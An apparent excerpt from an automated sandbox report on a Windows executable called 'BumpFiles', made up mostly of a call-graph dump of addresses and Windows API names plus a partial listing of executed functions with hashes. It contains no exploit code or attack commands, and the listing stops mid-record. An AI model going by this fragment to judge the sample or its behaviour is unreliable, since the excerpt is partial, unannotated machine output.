60bc9e 11922->11923 11924 609788 46 API calls 11923->11924 11925 60bcb4 11924->11925 11926 609788 46 API calls 11925->11926 11927 60bcca 11926->11927 11928 609748 46 API calls 11927->11928 11929 60bce1 11928->11929 11929->11896 12258 6096d0 11929->12258 11932 40a8a4 11931->11932 11933 425489 DeleteFileW 11932->11933 11934 4254d1 11933->11934 11935 42549b GetLastError GetFileAttributesW 11933->11935 11934->11859 11936 4254cb SetLastError 11935->11936 11937 4254ad 11935->11937 11936->11934 11937->11936 11938 4254b6 11937->11938 11939 4254bd RemoveDirectoryW 11938->11939 11939->11934 11941 42d911 11940->11941 11942 42d922 GetEnvironmentVariableW 11941->11942 11943 42d934 11942->11943 11944 42d941 11942->11944 11943->11863 11945 42d953 GetEnvironmentVariableW 11944->11945 11945->11943 11947 633bef 11946->11947 11948 633c23 ShellExecuteW 11947->11948 11949 633c4f 11948->11949 11949->11867 11950->11869 11952 4b5668 79 API calls 11951->11952 11953 4b5aa3 11952->11953 11959 4b5a3c 11953->11959 11955 4b5abe 11955->11873 11957 4b5668 79 API calls 11956->11957 11958 4b59ba 11957->11958 11958->11875 11960 4b5a50 11959->11960 11961 4b5a86 11960->11961 11963 4b3e00 11960->11963 11961->11955 11964 4b3e1d 11963->11964 11966 42a97c 46 API calls 11964->11966 11970 4b3e3a 11964->11970 11965 4b3e75 11965->11961 11967 4b3e35 11966->11967 11968 409410 4 API calls 11967->11968 11968->11970 11969 42a97c 46 API calls 11969->11970 11970->11965 11970->11969 11971 409410 4 API calls 11970->11971 11971->11970 11973 60b8e4 73 API calls 11972->11973 11974 60b83a 11973->11974 11975 42a97c 46 API calls 11974->11975 11980 60b855 11974->11980 11976 60b850 11975->11976 11977 409410 4 API calls 11976->11977 11977->11980 11978 60b881 11979 60b7f1 11978->11979 11985 60a5c0 11978->11985 11979->11887 11980->11978 11982 42a97c 46 API calls 11980->11982 11983 60b87c 11982->11983 11984 409410 4 API calls 11983->11984 11984->11978 11986 60a5d9 11985->11986 12005 43eb70 11986->12005 11989 60a82b 11992 40b08c 16 API calls 11989->11992 11991 60a611 11994 42a97c 46 API calls 11991->11994 12001 60a62c 11991->12001 11993 60a846 11992->11993 11993->11979 11995 60a627 11994->11995 11996 409410 4 API calls 11995->11996 11996->12001 11997 42a97c 46 API calls 11997->12001 11998 409410 4 API calls 11998->12001 11999 609694 46 API calls 11999->12001 12000 609658 46 API calls 12000->12001 12001->11989 12001->11997 12001->11998 12001->11999 12001->12000 12002 40c0c0 25 API calls 12001->12002 12003 6095e0 46 API calls 12001->12003 12018 43eab8 12001->12018 12002->12001 12003->12001 12023 4410f0 12005->12023 12010 60b0ac 12011 60b0d9 12010->12011 12012 40c0c0 25 API calls 12011->12012 12014 60b11b 12012->12014 12013 60b312 12013->11991 12014->12013 12016 60b29c 12014->12016 12042 6095e0 12014->12042 12016->12013 12017 40c0c0 25 API calls 12016->12017 12017->12013 12046 43fcbc 12018->12046 12020 43eacf 12021 40b8f8 25 API calls 12020->12021 12022 43eafa 12021->12022 12022->12001 12024 441112 12023->12024 12025 4410fb 12023->12025 12028 441131 12024->12028 12030 440f44 25 API calls 12024->12030 12026 42a97c 46 API calls 12025->12026 12027 44110d 12026->12027 12029 409410 4 API calls 12027->12029 12031 43eb7c 12028->12031 12036 43f238 12028->12036 12029->12024 12030->12028 12033 440f44 12031->12033 12034 40be18 25 API calls 12033->12034 12035 43eb85 12034->12035 12035->11989 12035->12010 12037 43f250 12036->12037 12038 42a97c 46 API calls 12037->12038 12041 43f282 12037->12041 12039 43f27d 12038->12039 12040 409410 4 API calls 12039->12040 12040->12041 12041->12031 12043 6095f5 12042->12043 12044 42a97c 46 API calls 12043->12044 12045 609628 12043->12045 12044->12045 12045->12014 12047 43fccc 12046->12047 12048 43fcd5 12047->12048 12049 43fcdf 12047->12049 12054 43fc7c 12048->12054 12051 43fce8 12049->12051 12060 42a83c 12049->12060 12051->12020 12056 43fc90 12054->12056 12055 43fc9b 12058 440f44 25 API calls 12055->12058 12056->12055 12057 42a83c 4 API calls 12056->12057 12057->12056 12059 43fcb8 12058->12059 12059->12020 12061 409410 4 API calls 12060->12061 12062 42a846 12061->12062 12062->12051 12064 60be07 12063->12064 12065 40b08c 16 API calls 12064->12065 12066 60be86 12065->12066 12093 60ca14 12066->12093 12069 40b34c 25 API calls 12070 60beb5 12069->12070 12111 60b5cc 12070->12111 12072 60bedd 12073 60bee5 12072->12073 12074 60bf6c 12072->12074 12076 40b08c 16 API calls 12073->12076 12126 42c1dc 12074->12126 12078 60bf0a 12076->12078 12077 60bf8d 12082 60bfa1 12077->12082 12083 60bfeb 12077->12083 12079 43d0d8 50 API calls 12078->12079 12080 60bf18 12079->12080 12081 40b34c 25 API calls 12080->12081 12084 60bf38 12081->12084 12139 4fb5e8 12082->12139 12089 4fb5e8 50 API calls 12083->12089 12117 609f84 12084->12117 12087 60bfc3 12087->11888 12088 60bf49 12090 40b08c 16 API calls 12088->12090 12092 60c02a 12089->12092 12091 60bf64 12090->12091 12091->11888 12092->11888 12094 60ca40 12093->12094 12095 60ca8d 12094->12095 12096 42a97c 46 API calls 12094->12096 12098 60cab8 12095->12098 12099 42a97c 46 API calls 12095->12099 12097 60ca88 12096->12097 12100 409410 4 API calls 12097->12100 12103 40b08c 16 API calls 12098->12103 12101 60cab3 12099->12101 12100->12095 12102 409410 4 API calls 12101->12102 12102->12098 12104 60cb1e 12103->12104 12105 43d0d8 50 API calls 12104->12105 12106 60cb29 12105->12106 12107 40b34c 25 API calls 12106->12107 12108 60cb46 12107->12108 12109 40b08c 16 API calls 12108->12109 12110 60be9e 12109->12110 12110->12069 12113 60b5e6 12111->12113 12112 60b67e 12112->12072 12113->12112 12151 431b00 12113->12151 12115 60b673 12155 431938 12115->12155 12118 609fa0 12117->12118 12119 609fc3 12118->12119 12120 609fb4 12118->12120 12122 431828 52 API calls 12119->12122 12211 431828 12120->12211 12123 609fbe 12122->12123 12124 431938 71 API calls 12123->12124 12125 60a00a 12124->12125 12125->12088 12127 42c215 12126->12127 12132 42c2a0 12127->12132 12138 42c235 12127->12138 12217 423884 12127->12217 12131 42c26d 12131->12132 12133 423884 CharUpperBuffW 12131->12133 12134 42c38a 12132->12134 12137 42c2f8 12132->12137 12133->12132 12136 40c0c0 25 API calls 12134->12136 12134->12138 12136->12134 12137->12138 12225 42f984 12137->12225 12138->12077 12142 4fb620 12139->12142 12146 4fb612 12139->12146 12140 4fb680 12241 4fc074 12140->12241 12142->12140 12143 42a97c 46 API calls 12142->12143 12145 4fb65c 12142->12145 12142->12146 12144 4fb657 12143->12144 12147 409410 4 API calls 12144->12147 12145->12140 12148 42a97c 46 API calls 12145->12148 12146->12087 12147->12145 12149 4fb67b 12148->12149 12150 409410 4 API calls 12149->12150 12150->12140 12152 431b09 12151->12152 12153 431b15 12151->12153 12179 431f14 12152->12179 12153->12115 12157 431955 12155->12157 12156 431979 12158 4319a1 12156->12158 12160 42aa4c 71 API calls 12156->12160 12157->12156 12159 42a97c 46 API calls 12157->12159 12161 4319c9 12158->12161 12164 42aa4c 71 API calls 12158->12164 12162 431974 12159->12162 12163 43199c 12160->12163 12165 4319fe 12161->12165 12169 42aa4c 71 API calls 12161->12169 12166 409410 4 API calls 12162->12166 12167 409410 4 API calls 12163->12167 12168 4319c4 12164->12168 12193 4311e8 12165->12193 12166->12156 12167->12158 12171 409410 4 API calls 12168->12171 12172 4319f9 12169->12172 12171->12161 12174 409410 4 API calls 12172->12174 12174->12165 12175 42a97c 46 API calls 12177 431a28 12175->12177 12176 431a2d 12176->12112 12178 409410 4 API calls 12177->12178 12178->12176 12180 431f1a 12179->12180 12183 431bfc 12180->12183 12182 431f38 12182->12153 12184 431c08 12183->12184 12185 431c22 12184->12185 12186 431c18 GetACP 12184->12186 12187 431c25 GetCPInfo 12185->12187 12186->12187 12188 431c42 12187->12188 12190 431c59 12187->12190 12189 42a97c 46 API calls 12188->12189 12191 431c54 12189->12191 12190->12182 12192 409410 4 API calls 12191->12192 12192->12190 12194 431214 12193->12194 12195 4311f9 12193->12195 12196 431241 12194->12196 12198 42aa4c 71 API calls 12194->12198 12195->12194 12197 42a97c 46 API calls 12195->12197 12201 42aa4c 71 API calls 12196->12201 12202 431269 12196->12202 12199 43120f 12197->12199 12200 43123c 12198->12200 12204 409410 4 API calls 12199->12204 12205 409410 4 API calls 12200->12205 12206 431264 12201->12206 12203 43129f 12202->12203 12207 42aa4c 71 API calls 12202->12207 12203->12175 12203->12176 12204->12194 12205->12196 12208 409410 4 API calls 12206->12208 12209 43129a 12207->12209 12208->12202 12210 409410 4 API calls 12209->12210 12210->12203 12212 431842 12211->12212 12213 431832 12211->12213 12212->12123 12214 431f14 52 API calls 12213->12214 12216 431840 12213->12216 12215 431875 12214->12215 12215->12123 12216->12123 12219 423893 12217->12219 12218 4238b4 12221 4238b8 12218->12221 12219->12218 12220 4238ae CharUpperBuffW 12219->12220 12220->12218 12222 4238c5 12221->12222 12223 4238f0 12222->12223 12224 4238ea CharLowerBuffW 12222->12224 12223->12131 12224->12223 12228 42fb00 12225->12228 12231 42f9a8 12228->12231 12232 42f9d3 12231->12232 12233 42f9ba 12231->12233 12235 42fa5c CompareStringW 12232->12235 12237 42fa5c 12233->12237 12236 42f9a1 12235->12236 12236->12137 12238 42fa75 12237->12238 12239 42facf CompareStringW 12238->12239 12240 42fa97 12238->12240 12239->12240 12240->12236 12244 4fbb44 12241->12244 12243 4fc07b 12243->12146 12245 4fbb58 12244->12245 12249 4fbb82 12244->12249 12246 42a97c 46 API calls 12245->12246 12245->12249 12247 4fbb7d 12246->12247 12248 409410 4 API calls 12247->12248 12248->12249 12249->12243 12251 6097a1 12250->12251 12252 6097ba 12251->12252 12253 42a97c 46 API calls 12251->12253 12254 609748 12252->12254 12253->12252 12255 609762 12254->12255 12256 42a97c 46 API calls 12255->12256 12257 60977b 12255->12257 12256->12257 12257->11918 12259 6096e5 12258->12259 12260 609719 12259->12260 12261 42a97c 46 API calls 12259->12261 12260->11896 12261->12260 12269 4071f0 12262->12269 12264 5eeafc 12264->11776 12266 5edfbe 12265->12266 12268 5edfcb 12266->12268 12274 5edea4 PeekMessageW 12266->12274 12268->11782 12270 407204 12269->12270 12271 407226 GetCommandLineW 12270->12271 12272 407208 GetModuleFileNameW 12270->12272 12273 407224 12271->12273 12272->12273 12273->12264 12275 5edec5 12274->12275 12280 5edfa6 12274->12280 12276 5edecb IsWindowUnicode 12275->12276 12277 5eded5 12275->12277 12276->12277 12278 5edefc PeekMessageA 12277->12278 12279 5edee6 PeekMessageW 12277->12279 12281 5edf10 12278->12281 12279->12281 12280->12266 12281->12280 12295 5efd40 GetCapture 12281->12295 12283 5edf4b 12283->12280 12302 5edd38 12283->12302 12292 5edf89 TranslateMessage 12293 5edf9e DispatchMessageA 12292->12293 12294 5edf96 DispatchMessageW 12292->12294 12293->12280 12294->12280 12296 5efd55 12295->12296 12297 5efd66 12295->12297 12296->12297 12330 532154 12296->12330 12297->12283 12299 5efd77 GetParent 12299->12297 12301 5efd71 12299->12301 12300 532154 7 API calls 12300->12301 12301->12297 12301->12299 12301->12300 12303 5edd63 12302->12303 12304 5edd4c 12302->12304 12303->12280 12306 5edbf0 12303->12306 12304->12303 12343 5ef320 12304->12343 12307 5edc3a 12306->12307 12308 5edc00 12306->12308 12307->12280 12310 5edc40 12307->12310 12308->12307 12309 5edc27 TranslateMDISysAccel 12308->12309 12309->12307 12311 5edd2e 12310->12311 12312 5edc5b 12310->12312 12311->12280 12325 5edba8 12311->12325 12312->12311 12313 5edc66 GetCapture 12312->12313 12314 5edcf0 GetWindowThreadProcessId GetWindowThreadProcessId 12313->12314 12315 5edc71 12313->12315 12314->12311 12316 5edd11 SendMessageW 12314->12316 12319 5edca2 12315->12319 12321 5edc8b GetParent 12315->12321 12322 5edc82 12315->12322 12494 5321b0 12315->12494 12316->12311 12317 5edccd 12316->12317 12317->12311 12320 5edca8 IsWindowUnicode 12319->12320 12319->12322 12323 5edcb2 SendMessageW 12320->12323 12324 5edcd1 SendMessageA 12320->12324 12321->12315 12322->12320 12323->12311 12323->12317 12324->12311 12324->12317 12326 5edbed 12325->12326 12327 5edbb9 IsWindowUnicode 12325->12327 12326->12280 12326->12292 12328 5edbda IsDialogMessageA 12327->12328 12329 5edbc5 IsDialogMessageW 12327->12329 12328->12326 12329->12326 12331 5321a6 12330->12331 12332 53215f GetWindowThreadProcessId 12330->12332 12331->12301 12332->12331 12333 53216a GetCurrentProcessId 12332->12333 12333->12331 12334 532174 12333->12334 12335 53217e GlobalFindAtomW 12334->12335 12336 53219f 12335->12336 12337 53218d GetPropW 12335->12337 12339 532120 GetCurrentProcessId GetWindowThreadProcessId 12336->12339 12337->12331 12340 532137 12339->12340 12341 53214d 12339->12341 12340->12341 12342 53213c SendMessageW 12340->12342 12341->12331 12342->12341 12344 5ef34d 12343->12344 12345 5ef336 12343->12345 12344->12303 12351 5ef2ac 12345->12351 12347 5ef33d 12360 5ebbe8 12347->12360 12352 5ef30c 12351->12352 12353 5ef2ba 12351->12353 12352->12347 12353->12352 12354 5ef2d0 IsWindowVisible 12353->12354 12354->12352 12355 5ef2da 12354->12355 12356 5ef30e 12355->12356 12357 5ef2ec 12355->12357 12372 5ef0b8 12356->12372 12359 5ef2f9 ShowWindow 12357->12359 12359->12352 12361 5ebbff 12360->12361 12362 5ebbf4 UnhookWindowsHookEx 12360->12362 12363 5ebc66 12361->12363 12364 5ebc20 SetEvent GetCurrentThreadId 12361->12364 12362->12361 12369 5ef0f8 12363->12369 12365 5ebc5d CloseHandle 12364->12365 12366 5ebc38 12364->12366 12365->12363 12367 5ebc44 MsgWaitForMultipleObjects 12366->12367 12378 5edfd0 12366->12378 12367->12365 12367->12366 12370 5ef115 12369->12370 12371 5ef105 KillTimer 12369->12371 12370->12344 12371->12370 12373 5ef0f8 KillTimer 12372->12373 12374 5ef0c8 SetTimer 12373->12374 12375 5ef0ed 12374->12375 12376 5ef0f4 12374->12376 12377 5ef320 127 API calls 12375->12377 12376->12352 12377->12376 12379 5edea4 128 API calls 12378->12379 12380 5edfdf 12379->12380 12381 5edfec 12380->12381 12383 5eec78 12380->12383 12381->12367 12403 5eebec GetCursorPos 12383->12403 12386 5ef320 125 API calls 12387 5eecc1 12386->12387 12406 5eeed4 12387->12406 12389 5eece3 12390 5eed31 GetCurrentThreadId 12389->12390 12391 5eed29 12389->12391 12392 5eed33 12389->12392 12395 5eedac 12390->12395 12396 5eedb3 12390->12396 12411 5eeb88 12391->12411 12392->12390 12399 5eed4f SetTimer 12392->12399 12417 4c2448 12395->12417 12397 5eedc6 12396->12397 12398 5eedc1 WaitMessage 12396->12398 12397->12381 12398->12397 12399->12390 12401 5eed76 12399->12401 12402 5eeb88 73 API calls 12401->12402 12402->12390 12448 533cc8 12403->12448 12408 5eeee8 12406->12408 12407 5eeefe 12407->12389 12408->12407 12453 55e8ac 12408->12453 12410 5eef1c 12410->12389 12415 5eeb95 12411->12415 12412 5eebe8 12412->12390 12414 5eebbf IsWindowVisible 12414->12415 12415->12412 12415->12414 12416 5eebd0 IsWindowEnabled 12415->12416 12457 5eaafc 12415->12457 12416->12415 12418 4c245c 12417->12418 12419 4c2465 12417->12419 12418->12396 12460 4c2b14 12419->12460 12422 4c24a3 12423 4c24a7 12422->12423 12424 4c24b0 12422->12424 12471 4c2420 WaitForSingleObject 12423->12471 12475 4c2414 ResetEvent 12424->12475 12425 4c2b14 77 API calls 12428 4c247c 12425->12428 12429 42aa4c 71 API calls 12428->12429 12430 4c249e 12429->12430 12431 409410 4 API calls 12430->12431 12431->12422 12432 4c24ae 12476 408c24 12432->12476 12434 4c24c9 12435 4089ac 13 API calls 12434->12435 12436 4c24d1 12435->12436 12437 4c263e 12436->12437 12480 4ae244 12436->12480 12437->12396 12441 4c2538 12488 408b8c 12441->12488 12443 4c2542 12444 408c24 5 API calls 12443->12444 12445 4c25f3 12444->12445 12446 4089ac 13 API calls 12445->12446 12447 4c25fb 12446->12447 12447->12396 12449 533c94 9 API calls 12448->12449 12450 533cdc 12449->12450 12451 53b780 71 API calls 12450->12451 12452 533d02 12450->12452 12451->12452 12452->12386 12452->12387 12454 55e8b2 12453->12454 12455 51b8f0 75 API calls 12454->12455 12456 55e8c7 12455->12456 12456->12410 12458 4ae244 71 API calls 12457->12458 12459 5eab0c 12458->12459 12459->12415 12461 41028c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 12460->12461 12463 4c2b1a 12461->12463 12462 4c2b6e 12465 41028c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 12462->12465 12463->12462 12464 4c0c10 77 API calls 12463->12464 12469 4c2b2f 12464->12469 12466 4c246a 12465->12466 12466->12422 12466->12425 12467 4d3934 71 API calls 12468 4c2b69 12467->12468 12470 41028c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 12468->12470 12469->12467 12470->12462 12472 4c2438 12471->12472 12473 4c2433 12471->12473 12472->12432 12474 4c2414 ResetEvent 12473->12474 12474->12472 12475->12432 12477 408c2c 12476->12477 12478 408850 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 12477->12478 12479 408c42 12477->12479 12478->12479 12479->12434 12481 4ae260 12480->12481 12482 4ae251 12480->12482 12484 4ae0b8 12481->12484 12483 4ae158 71 API calls 12482->12483 12483->12481 12485 4ae0c3 12484->12485 12486 4ae158 71 API calls 12485->12486 12487 4ae0d7 12485->12487 12486->12487 12487->12441 12489 408b94 12488->12489 12490 408c24 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 12489->12490 12491 408b9b 12490->12491 12492 408b44 GetCurrentThreadId Sleep 12491->12492 12493 408ba0 12492->12493 12493->12443 12495 532154 7 API calls 12494->12495 12496 5321ba 12495->12496 12496->12315 12497 40c498 12498 40c4c4 12497->12498 12499 40c4a8 GetModuleFileNameW 12497->12499 12500 40d70c 44 API calls 12499->12500 12500->12498 12501 5edea4 PeekMessageW 12502 5edec5 12501->12502 12507 5edfa6 12501->12507 12503 5edecb IsWindowUnicode 12502->12503 12504 5eded5 12502->12504 12503->12504 12505 5edefc PeekMessageA 12504->12505 12506 5edee6 PeekMessageW 12504->12506 12508 5edf10 12505->12508 12506->12508 12508->12507 12509 5efd40 9 API calls 12508->12509 12510 5edf4b 12509->12510 12510->12507 12511 5edd38 121 API calls 12510->12511 12512 5edf58 12511->12512 12512->12507 12513 5edbf0 TranslateMDISysAccel 12512->12513 12514 5edf6b 12513->12514 12514->12507 12515 5edc40 15 API calls 12514->12515 12516 5edf78 12515->12516 12516->12507 12517 5edba8 3 API calls 12516->12517 12518 5edf85 12517->12518 12518->12507 12519 5edf89 TranslateMessage 12518->12519 12520 5edf9e DispatchMessageA 12519->12520 12521 5edf96 DispatchMessageW 12519->12521 12520->12507 12521->12507 12522 407cfb 12527 407c54 12522->12527 12524 407d1f 12525 407d40 CompareStringW 12524->12525 12526 407d61 12525->12526 12530 40f034 12527->12530 12533 40efa4 12530->12533 12532 407c66 12532->12524 12534 40efc5 12533->12534 12535 40efeb 12534->12535 12536 40ed58 MultiByteToWideChar 12534->12536 12535->12532 12536->12535 12537 63c7a8 12538 63c7b6 12537->12538 12550 5ee0e8 12538->12550 12540 63c7cf 12541 5ee0e8 10 API calls 12540->12541 12542 63c7e2 12541->12542 12543 5ee0e8 10 API calls 12542->12543 12544 63c7f5 12543->12544 12545 5ee0e8 10 API calls 12544->12545 12546 63c808 12545->12546 12556 5ee244 12546->12556 12548 63c80f 12549 5edfb8 128 API calls 12548->12549 12549->12548 12552 5ee102 12550->12552 12551 5ee203 12551->12540 12552->12551 12553 5ee1bd GetWindowLongW SetWindowLongW 12552->12553 12554 5ee1e5 12552->12554 12553->12554 12569 5e0e94 GetWindowLongW 12554->12569 12558 5ee270 12556->12558 12557 5ee33d 12557->12548 12558->12557 12561 5ee28b 12558->12561 12580 5e58f8 12558->12580 12560 5ee2f3 12560->12557 12563 5edfd0 128 API calls 12560->12563 12561->12560 12562 5ee2d4 12561->12562 12564 5ee2f5 12561->12564 12584 5ed634 12562->12584 12563->12560 12609 5e3dc8 12564->12609 12570 5e0ead 12569->12570 12571 5e0ecf IsIconic IsWindowVisible 12570->12571 12572 5e0f50 12570->12572 12573 5e0efa ShowWindow 12571->12573 12574 5e0f02 12571->12574 12572->12551 12573->12574 12575 5e0f06 SetWindowLongW 12574->12575 12576 5e0f17 SetWindowLongW 12574->12576 12577 5e0f26 12575->12577 12576->12577 12577->12572 12578 5e0f3e ShowWindow 12577->12578 12579 5e0f48 ShowWindow 12577->12579 12578->12572 12579->12572 12581 5e5933 12580->12581 12582 5e5906 12580->12582 12581->12561 12582->12581 12583 5e592d ShowWindow 12582->12583 12583->12581 12613 5e0e10 12584->12613 12586 5ed643 12603 5ed69e 12586->12603 12616 5ec898 12586->12616 12588 5ed652 12589 5ed65b SetActiveWindow 12588->12589 12590 5ed667 12588->12590 12589->12590 12619 5ecaf4 12590->12619 12592 5ed674 12593 5ed6af 12592->12593 12595 5ed67d 12592->12595 12594 5ef118 2 API calls 12593->12594 12597 5ed6bc 12594->12597 12595->12603 12634 5ef118 IsWindowEnabled 12595->12634 12596 5ed72f 12637 5ebcc8 12596->12637 12597->12596 12601 5ed6d9 IsWindowEnabled 12597->12601 12601->12596 12604 5ed6e3 12601->12604 12602 5e58f8 ShowWindow 12602->12603 12603->12560 12606 5e90fc 12603->12606 12605 5ed708 SetWindowPos DefWindowProcW 12604->12605 12605->12603 12607 5e3dc8 77 API calls 12606->12607 12608 5e9108 12607->12608 12608->12560 12610 5e3dee 12609->12610 12612 5e3dd8 12609->12612 12610->12612 12672 5e5938 12610->12672 12612->12560 12614 5e0e1e 12613->12614 12615 5e0e2b IsIconic 12613->12615 12614->12586 12615->12586 12645 5ec798 12616->12645 12620 5ecb10 12619->12620 12622 5ecbae 12619->12622 12621 5ecb18 12620->12621 12623 5ecbb9 12620->12623 12621->12622 12625 5ecb2c EnumWindows 12621->12625 12622->12592 12623->12622 12624 5ecc23 12623->12624 12629 5ecc0c ShowWindow 12623->12629 12624->12622 12628 4ae244 71 API calls 12624->12628 12626 5ecb7f 12625->12626 12627 5ecb3d 12625->12627 12658 5ec9e8 GetWindow 12625->12658 12626->12622 12631 4ae244 71 API calls 12626->12631 12627->12626 12632 5ecb68 ShowWindow 12627->12632 12630 5ecc46 ShowOwnedPopups 12628->12630 12629->12624 12629->12629 12630->12622 12630->12624 12633 5ecba2 ShowOwnedPopups 12631->12633 12632->12626 12632->12632 12633->12622 12633->12626 12635 5ef138 EnableWindow 12634->12635 12636 5ed694 12634->12636 12635->12636 12636->12602 12668 5ebc6c SystemParametersInfoW 12637->12668 12640 5ebce1 ShowWindow 12642 5ebcec 12640->12642 12643 5ebcf3 12640->12643 12671 5ebc9c SystemParametersInfoW 12642->12671 12643->12603 12646 5ec7ad 12645->12646 12647 5ec834 12645->12647 12646->12647 12648 5ec7b6 EnumWindows 12646->12648 12647->12588 12648->12647 12649 5ec7d6 GetWindow GetWindowLongW 12648->12649 12653 5ec6d4 12648->12653 12650 5ec7f3 12649->12650 12650->12647 12651 4ae244 71 API calls 12650->12651 12652 5ec828 SetWindowPos 12651->12652 12652->12647 12652->12650 12655 5ec6ee 12653->12655 12654 5ec71e GetWindow 12656 5ec72a GetWindowLongW 12654->12656 12657 5ec736 12654->12657 12655->12654 12655->12657 12656->12657 12659 5eca1e 12658->12659 12660 5eca05 12658->12660 12662 5eca23 GetCurrentProcessId 12659->12662 12660->12659 12661 5eca12 GetWindowThreadProcessId 12660->12661 12661->12662 12663 5eca2d 12662->12663 12664 5ecabc 12663->12664 12665 5eca7c IsWindowVisible 12663->12665 12665->12664 12666 5eca86 12665->12666 12667 40c0c0 25 API calls 12666->12667 12667->12664 12669 5ebc8b 12668->12669 12669->12640 12670 5ebc9c SystemParametersInfoW 12669->12670 12670->12640 12671->12643 12673 5e5cda 12672->12673 12674 5e5950 12672->12674 12673->12612 12674->12673 12675 5e597e 12674->12675 12676 5e5969 12674->12676 12678 5e59aa 12675->12678 12680 5e5995 12675->12680 12694 5e512c 12676->12694 12679 5e5976 12678->12679 12711 5ebec4 12678->12711 12682 5e512c 74 API calls 12679->12682 12683 5e512c 74 API calls 12680->12683 12684 5e59c5 12682->12684 12683->12679 12718 5eaac8 12684->12718 12686 5eaac8 GetSystemMetrics 12693 5e59d6 12686->12693 12687 5ea5e8 GetMonitorInfoW 12687->12693 12688 5ea56c GetMonitorInfoW 12688->12693 12689 5eaab4 71 API calls 12689->12693 12690 5ea5a0 GetMonitorInfoW 12690->12693 12691 5ea588 GetMonitorInfoW 12691->12693 12692 5ea554 GetMonitorInfoW 12692->12693 12693->12673 12693->12686 12693->12687 12693->12688 12693->12689 12693->12690 12693->12691 12693->12692 12721 53efec 12694->12721 12696 5e513d MonitorFromWindow 12697 5eaac8 GetSystemMetrics 12696->12697 12698 5e514f 12697->12698 12699 5e517e 12698->12699 12704 5e516a 12698->12704 12723 5eaab4 12698->12723 12726 5ebe54 12699->12726 12701 5e5188 12703 5eaac8 GetSystemMetrics 12701->12703 12708 5e5192 12703->12708 12705 5eaab4 71 API calls 12704->12705 12706 5e5176 12705->12706 12706->12679 12707 5eaab4 71 API calls 12707->12708 12708->12706 12708->12707 12709 5e51ad 12708->12709 12710 5eaab4 71 API calls 12709->12710 12710->12706 12733 5ebe74 12711->12733 12714 5ebe54 72 API calls 12715 5ebede 12714->12715 12716 5ebe74 73 API calls 12715->12716 12717 5ebee4 12716->12717 12717->12679 12719 5eaada 12718->12719 12720 5eaad2 GetSystemMetrics 12718->12720 12719->12693 12720->12693 12722 53eff6 12721->12722 12722->12696 12724 4ae244 71 API calls 12723->12724 12725 5eaac4 12724->12725 12725->12698 12729 5ebe1c 12726->12729 12730 5ebe42 EnumDisplayMonitors 12729->12730 12732 5ebe2c 12729->12732 12730->12701 12731 4ae244 71 API calls 12731->12732 12732->12730 12732->12731 12734 5eaac8 GetSystemMetrics 12733->12734 12737 5ebe87 12734->12737 12735 5ebeb4 12735->12714 12735->12717 12736 5eaab4 71 API calls 12736->12737 12737->12735 12737->12736 12739 5ebea7 12737->12739 12741 5ea614 GetMonitorInfoW 12737->12741 12740 5eaab4 71 API calls 12739->12740 12740->12735 12741->12737

                                                                    Executed Functions

                                                                    Function 0040D3E4 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
                                                                    • Instruction ID: d95ccfb9285443909eeab24cd5826697557166218ec92875eff56e639bb6d067
                                                                    • Opcode Fuzzy Hash: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
                                                                    • Instruction Fuzzy Hash: 06F08271904644AECB50FBB5CC9299EB7ACEF483187E045B7B404F22D2EA3CAF14995D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D008 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D22D,?,?), ref: 0040D041
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D08A
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D0AC
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040D0CA
